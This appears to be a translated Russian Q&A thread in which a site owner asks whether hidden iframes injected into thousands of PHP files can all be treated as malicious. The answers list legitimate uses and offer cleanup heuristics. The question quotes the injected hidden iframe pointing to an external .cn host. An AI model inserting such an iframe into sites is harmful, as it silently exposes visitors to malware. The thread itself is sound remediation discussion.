Есть ли законное использование скрытого iframe в php?

Question

Есть ли законное использование для hidden iframe? У меня есть вирусы согласно Может ли файл быть прочитан и записан обратно с небольшими изменениями, не зная его кодировку в C #? , которые находятся во всех файлах php (кажется, одна запись на файл, но не может будь уверен с 5000 файлами).

Те, что я нашел, имеют это, но я не могу быть уверен, что есть другие с чем-то немного другим внутри. Могу ли я предположить, что все iframe с видимостью hidden являются вредоносными?

<iframe src="http://hugetopdiet.cn:8080/ts/in.cgi?pepsi13" width=2 height=4 style="visibility: hidden"></iframe>

Или, может быть, есть другой способ, которым я мог бы сказать своему коду C #, чтобы посмотреть на него? Я не хочу ломать файлы и веб-сайты, но я не могу просто найти точное значение, поскольку я могу что-то упустить.

Answer 1

Скрытый IFRAME, безусловно, может быть полезен в злонамеренных целях, но его можно использовать на законных основаниях. Например, вы можете использовать скрытый IFRAME для эмуляции асинхронных вызовов к серверу (ASP.Net сделал это в какой-то момент, если я помню).

Я также использовал IFRAMEs, чтобы обойти ограничения управления загрузкой файлов (для этого может быть полезно как скрытое, так и видимое IFRAMEs).

Подозрительно, но не вредоносно по умолчанию.

Answer 2

Некоторые старые счетчики трафика, которые я видел, используют скрытые iFrames для подсчета трафика, но это единственное законное использование скрытого iFrame;Мне, конечно, это не нравится, и если бы это был я, я бы тоже удалил их.

Еще одна вещь, которую вы можете проверить, это если iFrame был скрыт, а источник не из вашего домена.